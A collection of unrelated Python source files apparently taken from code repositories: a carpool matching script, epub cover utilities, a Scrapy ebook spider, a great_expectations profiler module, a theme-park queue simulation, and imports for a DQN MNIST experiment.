for rider in riders:
if rider[8] == "I'm flexible :)": flexible.append(rider)
else: non_flexible.append(rider)
return flexible, non_flexible
def match_all():
# when matching give priority to those who have an after church preference
# since it'll be easier to manually adjust for those who don't end up matched
nriders_flexible, nriders_non_flexible = split_into_flexible(nriders)
match(nriders_non_flexible, ndrivers)
match(nriders_flexible, ndrivers)
sdrivers.extend(odrivers)
sriders.extend(oriders)
sriders_flexible, sriders_non_flexible = split_into_flexible(sriders)
match(sriders_non_flexible, sdrivers)
match(sriders_flexible, sdrivers)
def write_cars_vertical(cars):
"""
Ad-hoc solution to make spreadsheet copiable outputs
"""
copy_output_file = "copy_paste.csv"
# try:
with open(copy_output_file, 'w') as text_file:
for car in cars:
text_file.write(car["driver"] + ',' + str(car[PREFERRED_PLAN]) + "\n")
for rider_key in car:
if rider_key.startswith("rider #"):
text_file.write(car[rider_key][0] + ',' + car[rider_key][1] + "\n")
text_file.write("\n")
# except IOError:
# print("I/O error")
# turn these mantches into a list of dicts
def write():
final_matches = []
# construct a row
for driver in matches.keys():
d = {"driver": driver}
pref_list = []
for idx, rider in enumerate(matches[driver]):
idx += 1
d["rider #" + str(idx)] = rider
print(rider[0])
pref_list.append(preferences[rider[0]])
c = Counter(pref_list)
d[PREFERRED_PLAN] = c.most_common()
final_matches.append(d)
pprint(final_matches)
write_cars_vertical(final_matches)
cols = final_matches[0].keys()
csv_file = "matches.csv"
try:
with open(csv_file, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=cols)
writer.writeheader()
for data in final_matches:
writer.writerow(data)
except IOError:
print("I/O error")
final_unmatched = []
for remaining in unmatched:
d = {"unmatched": remaining}
final_unmatched.append(d)
pprint(unmatched)
if final_unmatched:
cols = final_unmatched[0].keys()
csv_file = "unmatched.csv"
try:
with open(csv_file, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=cols)
writer.writeheader()
for data in final_unmatched:
writer.writerow(data)
except IOError:
print("I/O error")
load_balance()
match_all()
pprint(matches)
pprint(unmatched)
write()
``` |
{
"source": "jhwangus/haodoo",
"score": 3
} |
#### File: jhwangus/haodoo/haodoo_cover.py
```python
import sys, getopt, os, shutil
from ebooklib import epub
def usage():
''' Display command usage.'''
sys.stderr.write(__doc__)
sys.stderr.flush()
def check_file(fname, ext):
if not fname.lower().endswith(ext):
sys.stderr.write(ext.upper() + ": " + fname + " does not have a correct extension!\n")
sys.exit(2)
if not os.path.isfile(fname):
sys.stderr.write("File " + fname + " does not exist!\n")
sys.exit(2)
def main(argv):
# getopt
try:
opts, args = getopt.getopt(argv, "h")
except getopt.GetoptError:
usage()
sys.exit(2)
# handle options
for opt, optarg in opts:
if opt == '-h':
usage()
sys.exit()
if len(args) == 2:
epub_fname = args[0]
jpg_fname = args[1]
check_file(epub_fname, ".epub")
check_file(jpg_fname, ".jpg")
else:
usage()
sys.exit()
book = epub.read_epub(epub_fname)
f = open(jpg_fname, 'rb')
content = f.read()
f.close()
book.set_cover('cover.jpg', content)
epub.write_epub(epub_fname, book, {})
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: jhwangus/haodoo/haodoo_pp.py
```python
import sys, getopt, os, shutil, csv
from ebooklib import epub
def usage():
''' Display command usage.'''
sys.stderr.write(__doc__)
sys.stderr.flush()
def check_file(fname, ext):
if not fname.lower().endswith(ext):
sys.stderr.write(ext.upper() + ": " + fname + " does not have a correct extension!\n")
sys.exit(2)
if not os.path.isfile(fname):
sys.stderr.write("File " + fname + " does not exist!\n")
sys.exit(2)
def add_cover(epub_fname, jpg_fname):
book = epub.read_epub(epub_fname)
with open(jpg_fname, 'rb') as f:
book.set_cover('cover.jpg', f.read())
epub.write_epub(epub_fname, book, {})
def main(argv):
# getopt
try:
opts, args = getopt.getopt(argv, "h")
except getopt.GetoptError:
usage()
sys.exit(2)
# handle options
for opt, optarg in opts:
if opt == '-h':
usage()
sys.exit()
if len(args) == 1:
csv_name = args[0]
else:
usage()
sys.exit()
# check dirs
if not os.path.isdir('covers'):
sys.stderr.write('Cannot find cover images directory "covers/"\n')
sys.exit(2)
if not os.path.isdir('epub'):
sys.stderr.write('Cannot find cover images directory "epubs/"\n')
sys.exit(2)
if not os.path.exists('books'):
os.makedirs('books')
elif not os.path.isdir('books'):
sys.stderr.write('Cannot create output directory "books/"\n')
sys.stderr.write('A file with the same name exists.\n')
sys.exit(2)
#
with open(csv_name, encoding='utf-8') as f:
reader = csv.reader(f)
count = 0
next(reader, None)
for row in reader:
auth = row[0]
title = row[1]
i = row[2].find('P=')
epub = row[2][i+2:]
img = os.path.basename(row[4])
print(auth + '-' + title, epub, img)
shutil.copy('epub/' + epub, 'books/' + epub)
if img != '':
add_cover('books/' + epub, 'covers/' + img)
os.replace('books/' + epub, 'books/' + auth + ' - ' + title + '.epub')
count = count + 1
print('Total =', count)
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: jhwangus/haodoo/haodoo_spider.py
```python
import os, scrapy, urllib.request, hashlib
class haodooSpyder(scrapy.Spider):
name = "haodoo"
custom_settings = {
'DOWNLOAD_DELAY' : '0.35',
}
start_urls = ['http://haodoo.net']
def parse(self, response):
if not os.path.exists('epub'):
os.makedirs('epub')
if not os.path.exists('covers'):
os.makedirs('covers')
headpages = response.css('table')[2].css('td.a03 a::attr(href)').extract()
for pg in headpages:
if pg.find('audio') < 0 and pg.find('letter') < 0:
url = response.urljoin(pg)
yield response.follow(url, self.parse_heading)
def parse_heading(self, response):
links = response.css('script')[6].re(r'<a href="(.*)">')
for ln in links:
url = response.urljoin(ln)
yield response.follow(url, self.parse_listing)
def parse_listing(self, response):
books = response.css('div.a03 a::attr(href)').extract()
for bk in books:
if bk.find('.pdb') >= 0 or bk.find(':') >= 0:
# print(bk)
continue
url = response.urljoin(bk)
yield response.follow(url, self.parse_book)
def download(self, url, filename):
if url != '':
urllib.request.urlretrieve(url, filename)
m = hashlib.md5()
with open(filename, 'rb') as f:
while True:
data = f.read(65536)
if not data:
break
m.update(data)
return m.hexdigest()
else:
return ''
def parse_book(self, response):
names = response.css('script').re(r'SetTitle\("(.*)[《|【](.*)[》|】]"\);')
if len(names) == 0:
names = response.css('table')[6].re(r'<font .*>(.*)</font>[《|【](.*)[》|】]<input')
if len(names) >= 2:
author = names[0]
title = names[1]
else:
author = 'Unknown'
title = 'Unknown'
book_ids = response.css('input::attr(onclick)').re(r'DownloadEpub\(\'(.*)\'\)')
images = response.css('img::attr(src)').re(r'(covers/.*)')
count = len(book_ids)
imgl = len(images)
if count > 1:
i = 1
for book in book_ids:
ref = '?M=d&P=' + book + '.epub'
url = response.urljoin(ref)
if author == 'Unknown':
title = book
if imgl == 0:
img = ''
imgurl = ''
elif imgl < i:
img = images[-1]
imgurl = response.urljoin(img)
else:
img = images[i - 1]
imgurl = response.urljoin(img)
epub_md5 = self.download(url, 'epub/' + book + '.epub')
img_md5 = self.download(imgurl, img)
yield {
'author' : author,
'title' : title + '%02d' % i,
'epub' : url,
'epub_md5' : epub_md5,
'image' : imgurl,
'img_md5': img_md5,
}
i = i + 1
elif count == 1:
ref = '?M=d&P=' + book_ids[0] + '.epub'
url = response.urljoin(ref)
if author == 'Unknown':
title = book_ids[0]
if imgl > 0:
img = images[0]
imgurl = response.urljoin(img)
else:
img = ''
imgurl = ''
epub_md5 = self.download(url, 'epub/' + book_ids[0] + '.epub')
img_md5 = self.download(imgurl, img)
yield {
'author' : author,
'title' : title,
'epub' : url,
'epub_md5' : epub_md5,
'image' : imgurl,
'img_md5': img_md5,
}
``` |
{
"source": "jhweaver/great_expectations",
"score": 2
} |
#### File: great_expectations/profile/base.py
```python
import abc
import logging
import time
import warnings
from enum import Enum
from typing import Any
from dateutil.parser import parse
from great_expectations.core import ExpectationSuite, RunIdentifier
from great_expectations.exceptions import GreatExpectationsError
from ..data_asset import DataAsset
from ..dataset import Dataset
logger = logging.getLogger(__name__)
class ProfilerDataType(Enum):
"""Useful data types for building profilers."""
INT = "int"
FLOAT = "float"
STRING = "string"
BOOLEAN = "boolean"
DATETIME = "datetime"
UNKNOWN = "unknown"
class ProfilerCardinality(Enum):
"""Useful cardinality categories for building profilers."""
NONE = "none"
ONE = "one"
TWO = "two"
FEW = "few"
VERY_FEW = "very few"
MANY = "many"
VERY_MANY = "very many"
UNIQUE = "unique"
class ProfilerTypeMapping:
"""Useful backend type mapping for building profilers."""
# Future support possibility: JSON (RECORD)
# Future support possibility: BINARY (BYTES)
INT_TYPE_NAMES = [
"INTEGER",
"integer",
"int",
"INT",
"TINYINT",
"BYTEINT",
"SMALLINT",
"BIGINT",
"IntegerType",
"LongType",
"DECIMAL",
]
FLOAT_TYPE_NAMES = [
"FLOAT",
"DOUBLE",
"FLOAT4",
"FLOAT8",
"DOUBLE_PRECISION",
"NUMERIC",
"FloatType",
"DoubleType",
"float",
"number",
]
STRING_TYPE_NAMES = [
"CHAR",
"VARCHAR",
"NVARCHAR",
"TEXT",
"STRING",
"StringType",
"string",
"str",
]
BOOLEAN_TYPE_NAMES = [
"BOOLEAN",
"boolean",
"BOOL",
"TINYINT",
"BIT",
"bool",
"BooleanType",
]
DATETIME_TYPE_NAMES = [
"DATETIME",
"DATE",
"TIME",
"TIMESTAMP",
"DateType",
"TimestampType",
"datetime64",
"Timestamp",
]
class Profiler(object, metaclass=abc.ABCMeta):
"""
Profilers creates suites from various sources of truth.
These sources of truth can be data or non-data sources such as DDLs.
When implementing a Profiler ensure that you:
- Implement a . _profile() method
- Optionally implement .validate() method that verifies you are running on the right
kind of object. You should raise an appropriate Exception if the object is not valid.
"""
def __init__(self, configuration: dict = None):
self.configuration = configuration
def validate(self, item_to_validate: Any) -> None:
pass
def profile(self, item_to_profile: Any, suite_name: str = None) -> ExpectationSuite:
self.validate(item_to_profile)
expectation_suite = self._profile(item_to_profile, suite_name=suite_name)
return expectation_suite
@abc.abstractmethod
def _profile(
self, item_to_profile: Any, suite_name: str = None
) -> ExpectationSuite:
pass
class DataAssetProfiler(object):
@classmethod
def validate(cls, data_asset):
return isinstance(data_asset, DataAsset)
class DatasetProfiler(DataAssetProfiler):
@classmethod
def validate(cls, dataset):
return isinstance(dataset, Dataset)
@classmethod
def add_expectation_meta(cls, expectation):
expectation.meta[str(cls.__name__)] = {"confidence": "very low"}
return expectation
@classmethod
def add_meta(cls, expectation_suite, batch_kwargs=None):
class_name = str(cls.__name__)
expectation_suite.meta[class_name] = {
"created_by": class_name,
"created_at": time.time(),
}
if batch_kwargs is not None:
expectation_suite.meta[class_name]["batch_kwargs"] = batch_kwargs
new_expectations = [
cls.add_expectation_meta(exp) for exp in expectation_suite.expectations
]
expectation_suite.expectations = new_expectations
if "notes" not in expectation_suite.meta:
expectation_suite.meta["notes"] = {
"format": "markdown",
"content": [
"_To add additional notes, edit the <code>meta.notes.content</code> field in the appropriate Expectation json file._"
# TODO: be more helpful to the user by piping in the filename.
# This will require a minor refactor to make more DataContext information accessible from this method.
# "_To add additional notes, edit the <code>meta.notes.content</code> field in <code>expectations/mydb/default/movies/BasicDatasetProfiler.json</code>_"
],
}
return expectation_suite
@classmethod
def profile(
cls,
data_asset,
run_id=None,
profiler_configuration=None,
run_name=None,
run_time=None,
):
assert not (run_id and run_name) and not (
run_id and run_time
), "Please provide either a run_id or run_name and/or run_time."
if isinstance(run_id, str) and not run_name:
warnings.warn(
"String run_ids will be deprecated in the future. Please provide a run_id of type "
"RunIdentifier(run_name=None, run_time=None), or a dictionary containing run_name "
"and run_time (both optional). Instead of providing a run_id, you may also provide"
"run_name and run_time separately.",
DeprecationWarning,
)
try:
run_time = parse(run_id)
except (ValueError, TypeError):
pass
run_id = RunIdentifier(run_name=run_id, run_time=run_time)
elif isinstance(run_id, dict):
run_id = RunIdentifier(**run_id)
elif not isinstance(run_id, RunIdentifier):
run_name = run_name or "profiling"
run_id = RunIdentifier(run_name=run_name, run_time=run_time)
if not cls.validate(data_asset):
raise GreatExpectationsError("Invalid data_asset for profiler; aborting")
expectation_suite = cls._profile(
data_asset, configuration=profiler_configuration
)
batch_kwargs = data_asset.batch_kwargs
expectation_suite = cls.add_meta(expectation_suite, batch_kwargs)
validation_results = data_asset.validate(
expectation_suite, run_id=run_id, result_format="SUMMARY"
)
expectation_suite.add_citation(
comment=str(cls.__name__) + " added a citation based on the current batch.",
batch_kwargs=data_asset.batch_kwargs,
batch_markers=data_asset.batch_markers,
batch_parameters=data_asset.batch_parameters,
)
return expectation_suite, validation_results
@classmethod
def _profile(cls, dataset, configuration=None):
raise NotImplementedError
``` |
{
"source": "JHWelch/shapeland",
"score": 4
} |
#### File: shapeland/Code/park.py
```python
import random
import os
import json
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from tabulate import tabulate
from agent import Agent
from attraction import Attraction
from activity import Activity
class Park:
""" Park simulation class """
def __init__(self, attraction_list, activity_list, plot_range, version=1.0, random_seed=0, verbosity=0):
"""
Required Inputs:
attraction_list: list of attractions dictionaries
activity_list: list of activity dictionaries
Optional Inputs:
random_seed: seeds random number generation for reproduction
version: specify the version
verbosity: display metrics
"""
# static
self.attraction_list = attraction_list
self.activity_list = activity_list
self.plot_range = plot_range
self.random_seed = random_seed
self.version = version
self.verbosity = verbosity
# dynamic
self.schedule = {}
self.agents = {}
self.attractions = {}
self.activities = {}
self.history = {"total_active_agents": {}, "distributed_passes": 0, "redeemed_passes": 0}
self.time = 0
self.arrival_index = 0
self.park_close = None
def generate_arrival_schedule(self, arrival_seed, total_daily_agents, perfect_arrivals):
"""
Builds a schedule that determines how many agents arrive each minute throughout the day.
Each minute of the day is assigned from a Poisson distribution. A Poisson distribution generally
characterizes arrivals in many different settings. It is good to use if the arrivals are all
random and independent of each other.
Required Inputs:
arrival_seed: Dictionary of arrival distributions
total_daily_agents: Total agents visiting during the day
Optional Inputs:
perfect_arrivals: Enforces the exact number of daily agents to visit
"""
if sum(arrival_seed.values()) != 100:
raise AssertionError(
"The percent of hourly arrivals does not add up to 100%"
)
# determine how many hours the park is open
operating_hours = len(arrival_seed)
if operating_hours > 24:
raise AssertionError(f"Arrival Schedule suggests park is open more than 24 hours ({operating_hours})")
# generate arrivals per minute by drawing from poisson distribution
for hour, key in zip(range(operating_hours), arrival_seed):
arrival_pct = arrival_seed[key]
# The first hour with 0 arrivals dictates the park is closed
if arrival_pct == 0 and not self.park_close:
self.park_close = hour * 60
total_hour_agents = total_daily_agents * arrival_pct * 0.01 # convert integer pct to decimal
expected_minute_agents = total_hour_agents/60
# enforces randomness across hours but retains reproducibilty
rng = np.random.default_rng(self.random_seed+hour)
minute_arrivals = list(rng.poisson(lam=expected_minute_agents, size=60))
for minute, arrivals in zip(range(60), minute_arrivals):
exact_minute = hour*60 + minute
self.schedule.update({exact_minute: arrivals})
# enfore perfect arrivals
random.seed(self.random_seed)
if perfect_arrivals:
actual_total_daily_agents = sum(self.schedule.values())
dif = actual_total_daily_agents - total_daily_agents
if dif > 0:
for _ in range(dif):
rng_key = random.choice(list(key for key, val in self.schedule.items() if val>0))
self.schedule[rng_key] -= 1
if dif < 0:
for _ in range(dif*-1):
rng_key = random.choice(list(key for key, val in self.schedule.items() if val>0))
self.schedule[rng_key] += 1
assert sum(self.schedule.values()) == total_daily_agents
def generate_agents(self, behavior_archetype_distribution, exp_ability_pct, exp_wait_threshold, exp_limit):
""" Take a dictionary of agent behavior archetype distributions. Initializes agents. """
if sum(behavior_archetype_distribution.values()) != 100:
raise AssertionError(
"The percent of behavior archetypes does not add up to 100%"
)
total_agents = sum(self.schedule.values())
for agent_id in range(total_agents):
random.seed(self.random_seed + agent_id)
exp_ability = random.uniform(0,1) < exp_ability_pct
agent = Agent(random_seed=self.random_seed)
agent.initialize_agent(
agent_id=agent_id,
behavior_archetype_distribution=behavior_archetype_distribution,
exp_ability=exp_ability,
exp_wait_threshold=exp_wait_threshold,
exp_limit=exp_limit,
attraction_names=[attraction["name"] for attraction in self.attraction_list],
activity_names=[activity["name"] for activity in self.activity_list],
)
self.agents.update({agent_id: agent})
def generate_attractions(self):
""" Initializes attractions """
self.attraction_list = sorted(self.attraction_list, key=lambda k: k['popularity'])
for attraction in self.attraction_list:
self.attractions.update(
{
attraction["name"]: Attraction(attraction_characteristics=attraction)
}
)
def generate_activities(self):
""" Initializes activities """
self.activity_list = sorted(self.activity_list, key=lambda k: k['popularity'])
for activity in self.activity_list:
self.activities.update(
{
activity["name"]: Activity(activity_characteristics=activity, random_seed=self.random_seed)
}
)
def step(self):
""" A minute of time passes, update all agents and attractions. """
# allow new arrivals to enter
total_arrivals = self.schedule[self.time]
for new_arrival_index in range(total_arrivals):
agent_index = self.arrival_index + new_arrival_index
self.agents[agent_index].arrive_at_park(time=self.time)
self.arrival_index += total_arrivals
# get idle agents
idle_agent_ids = self.get_idle_agent_ids()
# get idle activity action
for agent_id in idle_agent_ids:
action, location = self.agents[agent_id].make_state_change_decision(
attractions_dict=self.attractions,
activities_dict=self.activities,
time=self.time,
park_closed=self.park_close<=self.time,
)
if action == "get pass":
self.history["distributed_passes"] += 1
self.update_park_state(
agent=self.agents[agent_id],
action=action,
location=location,
time=self.time,
attractions=self.attractions
)
# process attractions
for attraction_name, attraction in self.attractions.items():
exiting_agents, loaded_agents = attraction.step(time=self.time, park_close=self.park_close)
for agent_id in exiting_agents:
self.agents[agent_id].agent_exited_attraction(name=attraction_name, time=self.time)
for agent_id in loaded_agents:
if self.agents[agent_id].state["current_action"] == "browsing":
# force exit if expedited queue estimate was too high
self.activities[self.agents[agent_id].state["current_location"]].force_exit(agent_id=agent_id)
self.agents[agent_id].agent_exited_activity(
name=self.agents[agent_id].state["current_location"],
time=self.time
)
redeem = self.agents[agent_id].agent_boarded_attraction(name=attraction_name, time=self.time)
if redeem:
self.history["redeemed_passes"] += 1
# process activities
for activity_name, activity in self.activities.items():
exiting_agents = activity.step(time=self.time)
for agent_id in exiting_agents:
self.agents[agent_id].agent_exited_activity(name=activity_name, time=self.time)
# update time counters and history
for agent in self.agents.values():
agent.pass_time()
for attraction in self.attractions.values():
attraction.pass_time()
attraction.store_history(time=self.time)
for activity in self.activities.values():
activity.pass_time()
activity.store_history(time=self.time)
self.calculate_total_active_agents()
if self.verbosity == 1 and self.time % 60 == 0:
self.print_metrics()
if self.verbosity == 2:
self.print_metrics()
self.time += 1
def get_idle_agent_ids(self):
""" Identifies agents within park who have just arrived, who have exited a ride or who have left an activity """
idle_agent_ids = [
agent_id for agent_id, agent_dict in self.agents.items()
if agent_dict.state["within_park"] and agent_dict.state["current_action"] == "idling"
]
return idle_agent_ids
def update_park_state(self, agent, action, location, time, attractions):
""" Updates the agent state, attraction state and activity state based on the action """
if action == "leaving":
if agent.state["expedited_pass"]:
for attraction in agent.state["expedited_pass"]:
self.attractions[attraction].return_pass(agent.agent_id)
agent.return_exp_pass(attraction=attraction)
agent.leave_park(time=time)
if action == "traveling":
if location in self.attractions:
agent.enter_queue(attraction=location, time=time)
self.attractions[location].add_to_queue(agent_id=agent.agent_id)
if location in self.activities:
agent.begin_activity(activity=location, time=time)
self.activities[location].add_to_activity(
agent_id=agent.agent_id,
expedited_return_time=agent.state["expedited_return_time"]
)
if action == "get pass":
agent.get_pass(attraction=location, time=time)
self.attractions[location].remove_pass()
expedited_wait_time = self.attractions[location].add_to_exp_queue(agent_id=agent.agent_id)
agent.assign_expedited_return_time(expedited_wait_time=expedited_wait_time)
def calculate_total_active_agents(self):
""" Counts how many agents are currently active within the park """
active_agents = len([agent_id for agent_id, agent in self.agents.items() if agent.state["within_park"]])
self.history["total_active_agents"].update({self.time: active_agents})
def print_metrics(self):
""" Prints park metrics """
print(f"Time: {self.time}")
print(f"Total Agents in Park: {self.history['total_active_agents'][self.time]}")
print(f"Attraction Wait Times (Minutes):")
for attraction_name, attraction in self.attractions.items():
print(f" {attraction_name}: {attraction.history['queue_wait_time'][self.time]}")
print(f"Activity Visitor (Agents):")
for activity_name, activity in self.activities.items():
print(f" {activity_name}: {activity.history['total_vistors'][self.time]}")
print(f"{'-'*50}\n")
@staticmethod
def make_lineplot(dict_list, x, y, hue, title, location, show=False, y_max=None):
""" Create a hued lineplot derived from a list of dictionaries """
df = pd.DataFrame(dict_list)
l = [time for ind, time in enumerate(list(df['Time'].unique())) if ind%60==0]
plt.figure(figsize=(15,8))
ax = sns.lineplot(data=df, x=x, y=y, hue=hue)
ax.set(xticks=l, xticklabels=l, title=title)
ax.tick_params(axis='x', rotation=45)
if y_max:
ax.set(ylim=(0, y_max))
plt.savefig(location, transparent=False, facecolor="white", bbox_inches="tight")
plt.savefig(f"{location} Transparent", transparent=True, bbox_inches="tight")
plt.show()
if not show:
plt.close()
@staticmethod
def make_histogram(dict_list, x, title, location, show=False):
""" Create a histogram derived from a list of dictionaries """
df = pd.DataFrame(dict_list)
l = sorted(list(set(val for val in df[x])))
plt.figure(figsize=(15,8))
ax = sns.histplot(data=df, x=x, stat="percent", bins=np.arange(-0.5, len(l))) # weird trick to align labels
ax.set(title=title, xticks=l, xticklabels=l)
plt.savefig(location, transparent=False, facecolor="white", bbox_inches="tight")
plt.savefig(f"{location} Transparent", transparent=True, bbox_inches="tight")
plt.show()
if show:
disp_df = pd.DataFrame(df[x].describe()).reset_index()
disp_df.columns = ["Metric", x]
print(
tabulate(
disp_df,
headers='keys',
tablefmt='psql',
showindex=False,
floatfmt=('.2f')
)
)
if not show:
plt.close()
@staticmethod
def make_barplot(dict_list, x, y, hue, y_max, title, location, estimator=None, show=False):
""" Create a hued barplot derived from a list of dictionaries """
df = pd.DataFrame(dict_list)
plt.figure(figsize=(15,8))
if estimator:
ax = sns.barplot(data=df, x=x, y=y, hue=hue, ci=None, estimator=estimator)
else:
ax = sns.barplot(data=df, x=x, y=y, hue=hue)
ax.set(title=title)
if y_max:
ax.set(ylim=(0, y_max))
plt.savefig(location, transparent=False, facecolor="white", bbox_inches="tight")
plt.savefig(f"{location} Transparent", transparent=True, bbox_inches="tight")
plt.show()
if show and not estimator:
print(
tabulate(
df.sort_values(hue),
headers='keys',
tablefmt='psql',
showindex=False,
floatfmt=('.2f')
)
)
if show and estimator==sum:
print(
tabulate(
df.groupby(x).sum().reset_index(),
headers='keys',
tablefmt='psql',
showindex=False,
)
)
if not show:
plt.close()
def make_plots(self, show=False):
""" Plots key park information, save to version folder """
version_path = os.path.join(f"{self.version}")
if not os.path.exists(version_path):
os.mkdir(version_path)
# Attractions
queue_length = []
queue_wait_time = []
exp_queue_length = []
exp_queue_wait_time = []
for attraction_name, attraction in self.attractions.items():
for time, val in attraction.history["queue_length"].items():
queue_length.append({"Time": time, "Agents": val, "Attraction": attraction_name})
for time, val in attraction.history["queue_wait_time"].items():
queue_wait_time.append({"Time": time, "Minutes": val, "Attraction": attraction_name})
for time, val in attraction.history["exp_queue_length"].items():
exp_queue_length.append({"Time": time, "Agents": val, "Attraction": attraction_name})
for time, val in attraction.history["exp_queue_wait_time"].items():
exp_queue_wait_time.append({"Time": time, "Minutes": val, "Attraction": attraction_name})
avg_queue_wait_time = []
for attraction_name, attraction in self.attractions.items():
queue_wait_list = [
val for time, val in attraction.history["queue_wait_time"].items()
if time <= self.park_close
]
exp_queue_wait_list = [
val for time, val in attraction.history["exp_queue_wait_time"].items()
if time <= self.park_close
]
avg_queue_wait_time.append(
{
"Attraction": attraction_name,
"Average Wait Time": sum(queue_wait_list)/len(queue_wait_list),
"Queue Type": "Standby"
}
)
avg_queue_wait_time.append(
{
"Attraction": attraction_name,
"Average Wait Time": sum(exp_queue_wait_list)/len(exp_queue_wait_list),
"Queue Type": "Expedited"
}
)
# Activities
total_vistors = []
for activity_name, activity in self.activities.items():
for time, val in activity.history["total_vistors"].items():
total_vistors.append({"Time": time, "Agents": val, "Activity": activity_name})
# Agent Distribution
broad_agent_distribution = []
for time, total_agents in self.history["total_active_agents"].items():
broad_agent_distribution.append(
{
"Time": time,
"Approximate Percent": sum(
[attraction.history["queue_length"][time] for attraction in self.attractions.values()]
)/total_agents if total_agents > 0 else 0,
"Type": "Attractions"
}
)
broad_agent_distribution.append(
{
"Time": time,
"Approximate Percent": sum(
[activity.history["total_vistors"][time] for activity in self.activities.values()]
)/total_agents if total_agents > 0 else 0,
"Type": "Activities"
}
)
specific_agent_distribution = []
for time, total_agents in self.history["total_active_agents"].items():
for attraction_name, attraction in self.attractions.items():
specific_agent_distribution.append(
{
"Time": time,
"Approximate Percent": attraction.history["queue_length"][time]/total_agents if total_agents > 0 else 0,
"Type": attraction_name
}
)
for activity_name, activity in self.activities.items():
specific_agent_distribution.append(
{
"Time": time,
"Approximate Percent": activity.history["total_vistors"][time]/total_agents if total_agents > 0 else 0,
"Type": activity_name
}
)
attraction_counter = []
attraction_density = []
for agent_id, agent in self.agents.items():
attraction_counter.append(
{
"Agent": agent_id,
"Behavior": agent.behavior["archetype"],
"Total Attractions Visited": sum(
attraction['times_completed'] for attraction in agent.state["attractions"].values()
)
}
)
for attraction, attraction_dict in agent.state["attractions"].items():
attraction_density.append(
{
"Attraction": attraction,
"Visits": attraction_dict["times_completed"]
}
)
self.make_lineplot(
dict_list=queue_length,
x="Time",
y="Agents",
hue="Attraction",
y_max=self.plot_range["Attraction Queue Length"],
title="Attraction Queue Length",
location=f"{self.version}/Attraction Queue Length",
show=show,
)
self.make_lineplot(
dict_list=queue_wait_time,
x="Time",
y="Minutes",
hue="Attraction",
y_max=self.plot_range["Attraction Wait Time"],
title="Attraction Wait Time",
location=f"{self.version}/Attraction Wait Time",
show=show,
)
self.make_lineplot(
dict_list=exp_queue_length,
x="Time",
y="Agents",
hue="Attraction",
y_max=self.plot_range["Attraction Expedited Queue Length"],
title="Attraction Expedited Queue Length",
location=f"{self.version}/Attraction Expedited Queue Length",
show=show,
)
self.make_lineplot(
dict_list=exp_queue_wait_time,
x="Time",
y="Minutes",
hue="Attraction",
y_max=self.plot_range["Attraction Expedited Wait Time"],
title="Attraction Expedited Wait Time",
location=f"{self.version}/Attraction Expedited Wait Time",
show=show,
)
self.make_lineplot(
dict_list=total_vistors,
x="Time",
y="Agents",
hue="Activity",
y_max=self.plot_range["Activity Vistors"],
title="Activity Vistors",
location=f"{self.version}/Activity Vistors",
show=show,
)
self.make_lineplot(
dict_list=broad_agent_distribution,
x="Time",
y="Approximate Percent",
hue="Type",
y_max=self.plot_range["Approximate Agent Distribution (General)"],
title="Approximate Agent Distribution (General)",
location=f"{self.version}/Approximate Agent Distribution (General)",
show=show,
)
self.make_lineplot(
dict_list=specific_agent_distribution,
x="Time",
y="Approximate Percent",
hue="Type",
y_max=self.plot_range["Approximate Agent Distribution (Specific)"],
title="Approximate Agent Distribution (Specific)",
location=f"{self.version}/Approximate Agent Distribution (Specific)",
show=show,
)
self.make_barplot(
dict_list=avg_queue_wait_time,
x="Attraction",
y="Average Wait Time",
hue="Queue Type",
y_max=self.plot_range["Attraction Average Wait Times"],
title="Attraction Average Wait Times",
location=f"{self.version}/Attraction Average Wait Times",
show=show
)
self.make_histogram(
dict_list=attraction_counter,
x="Total Attractions Visited",
title="Agent Attractions Histogram",
location=f"{self.version}/Agent Attractions Histogram",
show=show,
)
self.make_barplot(
dict_list=attraction_density,
x="Attraction",
y="Visits",
hue=None,
y_max=self.plot_range["Attraction Total Visits"],
estimator=sum,
title="Attraction Total Visits",
location=f"{self.version}/Attraction Total Visits",
show=show
)
self.make_barplot(
dict_list= [
{
"Expedited Passes": " ",
"Total Passes": self.history["distributed_passes"],
"Type": "Distributed"
},
{
"Expedited Passes": " ",
"Total Passes": self.history["redeemed_passes"],
"Type": "Redeemed"
}
],
x="Expedited Passes",
y="Total Passes",
hue="Type",
y_max=self.plot_range["Expedited Pass Distribution"],
title="Expedited Pass Distribution",
location=f"{self.version}/Expedited Pass Distribution",
show=show
)
self.make_barplot(
dict_list= [
{
"Age Class": " ",
"Agents": len([agent_id for agent_id, agent in self.agents.items() if agent.state["age_class"] == "no_child_rides"]),
"Type": "No Child Rides"
},
{
"Age Class": " ",
"Agents": len([agent_id for agent_id, agent in self.agents.items() if agent.state["age_class"] == "no_adult_rides"]),
"Type": "No Adult Rides"
},
{
"Age Class": " ",
"Agents": len([agent_id for agent_id, agent in self.agents.items() if agent.state["age_class"] == "no_preference"]),
"Type": "No Preference"
},
],
x="Age Class",
y="Agents",
hue="Type",
y_max=self.plot_range["Age Class Distribution"],
title="Age Class Distribution",
location=f"{self.version}/Age Class Distribution",
show=show
)
def print_logs(self, N=None, selected_agent_ids=None):
""" Prints the logs of random agents or a list of agents """
if N:
all_agent_ids = list(self.agents.keys())
random.seed(self.random_seed)
selected_agent_ids = random.sample(all_agent_ids, N)
for agent_id in selected_agent_ids:
print(f"Agent ID: {agent_id}")
print(f"Agent Archetype: {self.agents[agent_id].behavior['archetype']}")
print(f"{self.agents[agent_id].log}\n")
@staticmethod
def write_data_to_file(data, output_file_path, output_file_format):
""" Takes a data object, writes and saves as a pickle or json. """
full_path = output_file_path + "." + output_file_format
if isinstance(full_path, str):
if output_file_format not in {"json"}:
raise ValueError(f"Incompatible file format :{output_file_format}")
# Create folder if not already present
folder = os.path.dirname(full_path)
if folder and not os.path.exists(folder):
os.makedirs(folder)
mode = "wt"
file_writer = open(full_path, mode)
else:
raise ValueError("full_path must be specified")
writers = {
"json": lambda file_writer: json.dump(data, file_writer, indent=2),
}
writers[output_file_format](file_writer)
file_writer.close()
``` |
{
"source": "JHWen/mnist_tensorflow",
"score": 3
} |
#### File: JHWen/mnist_tensorflow/dqn_mnist.py
```python
from keras.layers import *
from keras.models import Model
# from keras.utils.vis_utils import plot_model
from keras.utils import np_utils
import keras
import keras.backend as K
import numpy as np
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
# from IPython.display import Image
from tqdm import tqdm
from collections import deque
# import seaborn as sns
